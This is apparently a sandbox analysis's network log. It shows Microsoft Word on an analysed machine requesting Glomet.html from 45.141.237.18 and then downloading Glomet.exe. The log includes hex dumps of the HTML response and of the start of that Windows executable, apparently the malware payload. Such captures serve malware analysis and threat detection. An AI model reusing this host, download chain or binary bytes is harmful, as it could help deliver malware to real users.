                                                                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bc 5a 7b 77 da c8 92 ff 7f ce 99 ef a0 70 f7 1e 4c 02 08 49 3c 84 6d bc 27 f1 23 f1 ac f3 18 db 49 26 ce e6 78 5b 52 0b 34 16 6a 5d a9 65 4c b2 f9 ee 5b d5 dd 12 02 04 38 73 37 c3 b1 0c 52 77 d7 ab ab 7e 55 d5 70 f8 c4 63 2e 9f c7 54 9b f0 69 78 f4 eb 2f 87 f8 ae 85 24 1a 8f 6a 34 aa e1 93 27 ad d6 af bf 68 f0 7a cd bc c0 0f a8 a7 f9 09 9b 6a 7c 42 b5 13 ea 04 24 d2 58 12 8c 83 88 84 9a cf 12 ed bd 93 45 3c 93 2b 2e 48 ca b5 2c f6 08 a7 de be 66 76 8c 7e cb 30 5a 46 5f 8e 5e 51 ba 0f 7c 79 9c ee eb 7a 48 b2 c8 9d c4 c4 6b 47 94 eb 4e 36 4e 75 c3 b4 ed fe b0 83 93 5b ad 23 7c 3b 9c 50 e2 1d c9 d5 87 53 ca 89 58 de a2 ff ca 82 fb 51 ed 98 45 9c 46 bc 75 0d fa d4 34 57 de 8d 6a 9c 3e 70 1d d5 3a d0 dc 09 49 52 ca 47 ef af cf 5a 76 4d d3 73 52 3c e0 21 3d 7a 1e 13 77 42 4d a5 01 28 e7 93 2c e4 da 3b 32 06 39 cf b9 36 63 c9 5d 7a a8 cb c9 6a 65 ca e7 21 d5 d0 82 8a 91 9b a6 35 6d 4a bd 80 8c 6a a9 9b 50 69 44 4d 7b aa 7d 93 4b a6 24 01 63 ed 6b 9d f8 a1 7c 1d c8 51 30 80 17 44 e3 ea e1 ef bf fe 82 6f 0e f3 e6 4d b1 61 39 cd 62 95 05 b3 4b d7 81 5c 00 4b 88 7b 37 4e 58 16 79 2d 97 85 2c d9 d7 fe 71 62 9f bc 38 35 8b 19 3e 98 ab e5 93 69 10 ce f7 b5 0f 34 f1 48 44 9a 5a 4a a2 b4 95 d2 24 f0 0f 4a d3 d2 e0 2b 58 c4 30 62 ae 9e a2 e6 2d 12 06 63 d0 cb 05 a3 d3 a4 2c af 17 dc b7 a7 24 88 6e 63 b0 64 21 32 4b 03 1e 30 58 90 d0 90 f0 e0 9e 2a 5a 5e 90 c6 21 01 21 38 71 42 5a c8 37 0b 3c 3e d9 d7 ec 4e a7 a4 96 b4 65 cb 61 9c b3 e9 be d2 b8 34 10 52 9f ef 6b 24 e3 6c f9 39 f8 eb 64 79 60 8b dd 95 05 59 e2 d1 a4 a5 c4 30 0b 4e ea 79 6e 55 d3 30 07 96 bd 3c 26 7c 64 5f 4b 59 18 78 db 76 e4 4c bc 8a 19 bb 8d 8a f6 bc c5 90 a0 49 6e d6 09 95 aa 0d 87 85 84 4a 64 a3 d3 f9 e7 56 ee bd b3 fe d9 60 1b 8b 34 86 58 5f f1 62 a3 57 b2 57 af 6c b0 b2 a7 d8 82 75 f1 74 a6 84 74 58 e8 6d 63 18 4c c7 ab fc ac 12 bb ee fa fe ec 6f 8a 19 24 2d 1c ea 96 f9 b7 0a 1a d2 9c b8 1b 52 02 4b d1 5b 16 ae 05 6e 92 6f 76 85 cf fd 50 a8 6d d9 58 c5 73 bb 9c b7 01 a7 d3 6d c2 56 6d 71 2e 67 77 93 43 ef 94 33 7f dc 11 af 83 7f 4b 78 b2 ba 91 fd 92 58 fd f5 bd 52 ab 6f 53 ea 22 4a 54 b9 c1 cf 31 fe 0a e3 5b 9c bf 06 b3 68 53 1b 3d 50 be 6f b7 58 39 10 3a 2a 10 76 31 8c 13 ba aa b2 ad 8c 65 57 e7 0b 5b 0d d9 2b 22 2d e3 96 b1 8a 5b 0a 9b 3c 40 50 ea 55 43 5a a1 cc 6e e8 28 2b 2c 09 07 1c 6c ed 3e 4e e7 65 8d 0b 54 df ed 1d 72 7d 16 36 37 0f 86 c1 d6 4d 34 2a 98 e4 eb 97 01 76 29 d5 f6 95 0b f6 b7 bb a0 7d 3a 3c 7e 61 ae 79 49 e1 99 9b 81 71 25 e1 9a ff ac 88 c2 ea dc b0 2c fd 6d 02 65 db b7 8d 02 1e 9f 98 46 f7 6c 07 89 71 42 e7 5b 68 0c cf 86 96 dd 2f d3 68 fb 21 83 cc 1e 8d 6f 69 48 a7 20 e5 ce dc 2f 16 fc 18 ae 34 b7 fa 44 01 3b c2 60 1e 75 59 42 24 e7 88 45 f4 b1 39 69 13 ef fd 30 88 ee 9a 3b 67 dd 07 a0 2e f5 76 4f 24 2e da a2 00 fa 75 30 79 8c 4c 13 76 bf f0 d6 8a 7d 5a 09 e7 0a 67 dc 15 68 2b 7a 6f 98 53 d6 7a db bc 65 a5 ab 0a d5 e3 93 b3 d3 fe 36 8c dd 2d f0 5f 34 4a c1 7a 89 c7 3d 04 1e b4 34 4c 11 fc ae 5a 01 5d 40 9e ec 53 f4 a2 51 39 c4 6a 3d ef 16 60 35 e4 6f 92 a6 a3 5a 51 10 d7 d4 e0 f2 70 b9 0c 5a 0d a3 c5 0a 58 83 35 52 9a b8 a3 9a 1e 80 ee a9 9e 89 e6 a5 15 b2 31 6b c7 d1 b8 a6 91 10 7a 20 d5 d2 5c c0 d3 5a ce 62 8d ac 5e a6 2b 8a bd
                                                                                                                                                                            Data Ascii: Z{wpLI<m'#I&x[R4j]eL[8s7Rw~Upc.Tix/$j4'hzj|B$XE<+.H,fv~0ZF_^Q|yzHkGN6Nu[#|;PSXQEFu4Wj>p:IRGZvMsR<!=zwBM(,;296c]zje!5mJjPiDM{}K$ck|Q0DoMa9bK\K{7NXy-,qb85>i4HDZJ$J+X0b-c,$ncd!2K0X*Z^!!8qBZ7<>Nea4Rk$l9dy`Y0NynU0<&|d_KYxvLInJdV`4X_bWWluttXmcLo$-RK[novPmXsmVmq.gwC3KxXRoS"JT1[hS=PoX9:*v1eW[+"-[<@PUCZn(+,l>NeTr}67M4*v)}:<~ayIq%,meFlqB[h/h!oiH /4D;`uYB$E9i0;g.vO$.u0yLv}Zgh+zoSze6-_4Jz=4LZ]@SQ9j=`5oZQpZX5R1kz \Zb^+
                                                                                                                                                                            Jul 15, 2022 15:26:42.169908047 CEST1287INData Raw: 4d 33 4b 13 35 6d a5 6d d2 4e ce 4f 5e 9e 5e 9e 9f bc 7d 5b 22 a7 23 bd 85 a6 3a a8 aa 7a cb 75 dd d7 eb b4 ad 16 28 ad 5c 81 ec 0a 00 5b 16 fd fa f9 8b 8b 53 ed ed 99 76 fc f6 cd f5 e9 9b eb ab b2 c4 52 c4 2a 36 1b 62 6f bb 99 0e a1 59 4d a8 3f
                                                                                                                                                                            Data Ascii: M3K5mmNO^^}["#:zu(\[SvR*6boYM?8,v)coc+|A(te5qw~VY-F\4F5$6'3d nk$H5Oh)DGP\p96bdidd/(
                                                                                                                                                                            Jul 15, 2022 15:26:42.169924974 CEST1289INData Raw: f5 01 18 83 df 89 8a d2 c7 b6 4a 94 78 3f 39 ec 34 27 88 48 32 17 fd 94 6a 6c 55 da d6 4e 44 27 25 30 13 d2 05 74 77 5b 69 d1 08 a0 84 45 e2 0b 04 68 51 03 0c 1f 80 10 05 ba 9b ca 7a 55 a5 45 94 7a 98 cf 2b 6b d4 d2 4b 24 66 80 58 c8 25 80 89 9e
                                                                                                                                                                            Data Ascii: Jx?94'H2jlUND'%0tw[iEhQzUEz+kK$fX%,EWd|L0T\;-0fmL%C'0<=jW.?X*Ru|hvrbn_s;5rc-hn[Zs(ESU :
                                                                                                                                                                            Jul 15, 2022 15:26:42.169941902 CEST1289INData Raw: 69 ad 7a e7 c1 75 eb a5 c9 07 df 55 d0 f7 3c db 76 9c 51 c1 18 e4 81 84 1c d2 bd 27 4f 3e 7f 69 7c e3 c9 3c 87 07 c3 e8 74 87 de 28 c6 1f bb 9f 47 7c 6f 21 4d ab f3 d0 b5 9b c8 a4 6b d6 1b 0d 1d 1f f4 9c a7 9d 07 ff 19 e8 0d ef ce 60 f0 0c 9e 99
                                                                                                                                                                            Data Ascii: izuU<vQ'O>i|<t(G|o!Mk`7v^56?Q$&,7l=g{+V\NG,;6/t)zXl@)^`#G(OsP$oIP/)l$a-dD)TWCXbI
                                                                                                                                                                            Jul 15, 2022 15:26:42.365726948 CEST1290OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:42.398989916 CEST1290INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Jul 15, 2022 15:26:42.581449032 CEST1290OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:42.629255056 CEST1291INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Jul 15, 2022 15:26:42.814599991 CEST1292OUTGET /Glomet.html HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            If-None-Match: "80119226a397d81:0"
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:42.846234083 CEST1292INHTTP/1.1 304 Not Modified
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Etag: "80119226a397d81:0"
                                                                                                                                                                            Jul 15, 2022 15:26:42.859576941 CEST1293OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:42.890403986 CEST1293INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Jul 15, 2022 15:26:43.063157082 CEST1293OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:43.091305971 CEST1294INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:43 GMT
                                                                                                                                                                            Jul 15, 2022 15:26:43.149804115 CEST1294OUTGET /icons/ubuntu-logo.png HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Referer: http://45.141.237.18/Glomet.html
                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:43.180100918 CEST1295INHTTP/1.1 404 Not Found
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:43 GMT
                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
                                                                                                                                                                            Jul 15, 2022 15:26:43.180160999 CEST1295INData Raw: 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                            Data Ascii: </fieldset></div></div></body></html>
                                                                                                                                                                            Jul 15, 2022 15:26:45.406270981 CEST1296OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:45.437230110 CEST1297INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:45 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            2192.168.2.34976645.141.237.1880C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 15, 2022 15:28:25.418613911 CEST7929OUTGET /Glomet.exe HTTP/1.1
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:28:25.452181101 CEST7931INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 21:48:58 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "7dc29185cb97d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:28:25 GMT
                                                                                                                                                                            Content-Length: 346688
                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3c 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 7c 02 00 00 04 00 00 b3 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 04 00 00 d1 f2 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 04 00 d0 1f 00 00 00 00 00 00 00 00 00 00 50 2b 05 00 f0 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d0 1f 00 00 00 80 04 00 00 20 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 28 f4 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 64 82 40 00 e9 42 01 00 00 53 56 8b 35 30 f4 42 00 8d 45 a4 57 50 ff 75 08
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPEL<Oaf|3@@DP+.textef `.rdataj@@.data8U~@.ndata.rsrc @@U\}t+}FEuH(BHPuuud@BSV50BEWPu
                                                                                                                                                                            Jul 15, 2022 15:28:25.452215910 CEST7932INData Raw: ff 15 5c 82 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 6c 82 40 00 8b 7d f0 83 65 f0 00 8b 1d 60 80 40 00 e9 80 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 89 4d 10 99 f7 ff 33 d2 8a f0 0f b6 46 51 0f af
                                                                                                                                                                            Data Ascii: \@eEEPul@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu@uE9}w~Xtev4X@EtU}jWEEL@vXWd@u
                                                                                                                                                                            Jul 15, 2022 15:28:25.452234983 CEST7933INData Raw: ff d6 8b 45 d8 8b 0d 04 ec 42 00 3b cb 0f 84 31 15 00 00 50 51 ff d6 e9 28 15 00 00 6a f0 e8 95 16 00 00 ff 75 dc 50 ff 15 fc 80 40 00 85 c0 0f 85 0f 15 00 00 e9 0d 12 00 00 6a f0 e8 77 16 00 00 8b f8 57 e8 b8 46 00 00 8b f0 3b f3 74 54 6a 5c 56
                                                                                                                                                                            Data Ascii: EB;1PQ(juP@jwWF;tTj\V<F:Eu9]tBtWEBWB;t=uW@uEEF:u9]t)jWhXCLW@{EsjSPiOjj
                                                                                                                                                                            Jul 15, 2022 15:28:25.452253103 CEST7935INData Raw: 8b 45 e4 83 f8 0d 0f 87 94 00 00 00 ff 24 85 df 2b 40 00 03 f9 e9 5a 03 00 00 2b f9 e9 53 03 00 00 0f af cf eb 1a 3b cb 74 53 8b c7 99 f7 f9 8b f8 e9 3e 03 00 00 0b cf eb 06 23 cf eb 02 33 cf 8b f9 e9 2d 03 00 00 33 c0 3b fb 0f 94 c0 eb df 3b fb
                                                                                                                                                                            Data Ascii: E$+@Z+S;tS>#3-3;;u3;t;t3G;t3E}jjPWVU4@>E=x@;tDH;?;u;
